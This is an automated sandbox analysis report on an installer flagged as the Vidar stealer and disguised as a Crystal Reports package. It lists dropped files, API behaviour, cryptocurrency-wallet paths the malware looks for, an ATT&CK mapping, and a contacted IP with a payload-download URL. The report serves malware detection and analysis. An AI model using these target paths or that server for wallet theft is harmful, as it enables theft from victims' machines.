        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-33ENG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libmongoc-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgthread-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libbson-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-B5IQO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5F8P5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-0V44S.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-OSEV1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-VO510.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\tsharkdecode.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgpg-error6-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-Q7NRR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libnettle-4-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libffi-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,1_2_004AF91C
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040AEF4 FindFirstFileW,FindClose,1_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,1_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040AEF4 FindFirstFileW,FindClose,5_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0060C2B0 FindFirstFileW,GetLastError,6_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040E6A0 FindFirstFileW,FindClose,6_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,6_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,6_2_006B8DE4
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeThread delayed: delay time: 35000Jump to behavior
        Source: CrystalReports.exe, 00000007.00000002.562973809.00000000029C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeCode function: 7_2_6E2BEB08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6E2BEB08
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006A60E8 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,3_2_006A60E8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe' Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_005C8B3C
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_005C7CE0
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmpBinary or memory string: Program Manager
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: CrystalReports.exe, 00000007.00000002.562776703.0000000001260000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,1_2_0040B044
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetLocaleInfoW,1_2_0041E034
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetLocaleInfoW,1_2_0041E080
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetLocaleInfoW,1_2_004AF218
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0040A4CC
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_0040E7F0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: GetLocaleInfoW,3_2_006103F8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0040DC78
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,5_2_0040B044
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetLocaleInfoW,5_2_0041E034
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetLocaleInfoW,5_2_0041E080
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: GetLocaleInfoW,5_2_004AF218
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0040A4CC
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,6_2_0040E7F0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: GetLocaleInfoW,6_2_006103F8
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0040DC78
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00405AE0 cpuid 1_2_00405AE0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,3_2_00625754
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0041C3D8 GetLocalTime,1_2_0041C3D8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,1_2_004B5114

        Stealing of Sensitive Information:

        barindex
        Yara detected Vidar stealerShow sources
        Source: Yara matchFile source: Process Memory Space: CrystalReports.exe PID: 6532, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)Show sources
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: \Electrum\wallets\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: ElectronCash
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: \Electrum\wallets\
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: window-state.json
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: \Exodus\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: info.seco
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: \Exodus\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: default_wallet
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: file__0.localstorage
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: \MultiDoge\
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: \Exodus\exodus.wallet\
        Source: CrystalReports.exe, 00000007.00000002.562865621.000000000285C000.00000004.00000001.sdmpString found in binary or memory: seed.seco
        Source: CrystalReports.exe, 00000007.00000002.562871890.0000000002890000.00000004.00000001.sdmpString found in binary or memory: \Electrum-LTC\wallets\
        Source: Yara matchFile source: 00000007.00000002.562826054.0000000002670000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CrystalReports.exe PID: 6532, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Yara detected Vidar stealerShow sources
        Source: Yara matchFile source: Process Memory Space: CrystalReports.exe PID: 6532, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder1Exploitation for Privilege Escalation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/JobDLL Side-Loading1Access Token Manipulation1Virtualization/Sandbox Evasion11LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Process Injection13Access Token Manipulation1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Process Injection13NTDSVirtualization/Sandbox Evasion11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptDLL Side-Loading1Deobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemSystem Information Discovery35Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 492023 Sample: br4Cu3BycW.exe Startdate: 28/09/2021 Architecture: WINDOWS Score: 76 40 Multi AV Scanner detection for dropped file 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected Vidar stealer 2->44 46 3 other signatures 2->46 9 br4Cu3BycW.exe 2 2->9         started        process3 file4 32 C:\Users\user\AppData\...\br4Cu3BycW.tmp, PE32 9->32 dropped 12 br4Cu3BycW.tmp 3 13 9->12         started        process5 file6 34 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 12->34 dropped 15 br4Cu3BycW.exe 2 12->15         started        process7 file8 36 C:\Users\user\AppData\...\br4Cu3BycW.tmp, PE32 15->36 dropped 18 br4Cu3BycW.tmp 5 127 15->18         started        process9 file10 24 C:\Users\user\AppData\...\is-7MTO8.tmp, PE32 18->24 dropped 26 C:\Users\user\...\CrystalReports.exe (copy), PE32 18->26 dropped 28 C:\Users\user\...\tsharkdecode.dll (copy), PE32+ 18->28 dropped 30 38 other files (none is malicious) 18->30 dropped 21 CrystalReports.exe 13 18->21         started        process11 dnsIp12 38 147.135.170.166, 80 OVHFR France 21->38

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        br4Cu3BycW.exe6%VirustotalBrowse
        br4Cu3BycW.exe29%ReversingLabsWin32.Trojan.Sabsik

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-7MTO8.tmp100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmp0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmp0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)11%ReversingLabsWin32.Trojan.Sabsik
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)0%MetadefenderBrowse
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)2%ReversingLabs
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)0%MetadefenderBrowse
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmp0%MetadefenderBrowse
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmp0%ReversingLabs
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)0%MetadefenderBrowse
        C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.elecard.com1%VirustotalBrowse
        http://www.elecard.com0%Avira URL Cloudsafe
        http://www.filehelpers.com00%Avira URL Cloudsafe
        http://www.filehelpers.comg0%Avira URL Cloudsafe
        http://147.135.170.166/0%Avira URL Cloudsafe
        http://147.135.170.166/public/sqlite3.dll0%Avira URL Cloudsafe
        http://www.tux4kids.com.0%Avira URL Cloudsafe
        http://www.filehelpers.com0%Avira URL Cloudsafe
        http://bura-bura.com/blog/archives/2005/08/02/how-to-compile-an-application-for-102-or-103-using-xco0%Avira URL Cloudsafe
        http://translationproject.org/extra/matrix.html0%Avira URL Cloudsafe
        http://translationproject.org/0%Avira URL Cloudsafe
        https://www.remobjects.com/ps0%URL Reputationsafe
        http://www.galuzzi.it.0%Avira URL Cloudsafe
        https://www.innosetup.com/0%URL Reputationsafe
        http://tux4kids.net/~jdandr2)0%Avira URL Cloudsafe
        http://www.filehelpers.com40%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.elecard.combr4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUbr4Cu3BycW.exe, 00000001.00000000.291530207.0000000000401000.00000020.00020000.sdmp, br4Cu3BycW.exe, 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmpfalse
          		high
          http://www.filehelpers.com0br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://tux4kids.alioth.debian.orgbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
            		high
            HTTP://WWW.MPEGLA.COM.br4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpfalse
              		high
              http://www.libsdl.orgbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                		high
                http://www.gnu.org/philosophy/why-not-lgpl.htmlbr4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.563020434.0000000002DF1000.00000004.00000001.sdmpfalse
                  		high
                  http://sources.redhat.com/pthreads-win32/d&br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                    		high
                    http://www.filehelpers.comgbr4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.libsdl.org/projects/SDL_mixer/br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                      		high
                      http://147.135.170.166/CrystalReports.exe, 00000007.00000002.562905629.000000000298E000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.562973809.00000000029C9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://sourceforge.net/tracker/index.php?func=detail&aid=421508&group_id=12715&atid=112715)br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                        		high
                        http://www.iisc.ernet.inbr4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpfalse
                          		high
                          http://147.135.170.166/public/sqlite3.dllCrystalReports.exe, 00000007.00000002.562956056.00000000029BC000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tux4kids.com.br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.filehelpers.combr4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.libsdl.org/projects/SDL_imagebr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                            		high
                            http://www.libsdl.org/projects/SDL_image/br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                              		high
                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlinebr4Cu3BycW.exefalse
                                		high
                                http://bura-bura.com/blog/archives/2005/08/02/how-to-compile-an-application-for-102-or-103-using-xcobr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://translationproject.org/extra/matrix.htmlbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://translationproject.org/br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=104456&repeatmerged=yesbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.libsdl.org/projects/SDL_ttfbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.libsdl.org/projects/SDL_ttf/br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                      		high
                                      http://sourceforge.net/bugs/?func=detailbug&bug_id=131474&group_id=12715)br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.remobjects.com/psbr4Cu3BycW.tmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galuzzi.it.br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.innosetup.com/br4Cu3BycW.tmp, br4Cu3BycW.tmp, 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://sourceforge.net/tracker/index.php?func=detail&aid=414339&group_id=12715&atid=112715)br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                          		high
                                          http://tux4kids.net/~jdandr2)br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://fsf.org/br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.563020434.0000000002DF1000.00000004.00000001.sdmpfalse
                                            		high
                                            http://scripts.sil.org/OFLbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.libsdl.org/projects/SDL_mixerbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                                		high
                                                http://alioth.debian.org/forum/?group_id=31080br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.libsdl.org/download-1.2.phpbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://sdlpango.sourceforge.netbr4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmpfalse
                                                      		high
                                                      HTTP://WWW.MPEGLA.COMbr4Cu3BycW.tmp, 00000006.00000003.313702473.000000000533D000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.filehelpers.com4br4Cu3BycW.tmp, 00000006.00000003.313906776.00000000054C8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gnu.org/licenses/CrystalReports.exe, 00000007.00000002.563020434.0000000002DF1000.00000004.00000001.sdmpfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          147.135.170.166
                                                          		unknownFrance
                                                          		16276OVHFRfalse

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:492023
                                                          Start date:28.09.2021
                                                          Start time:09:30:50
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 58s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:br4Cu3BycW.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:22
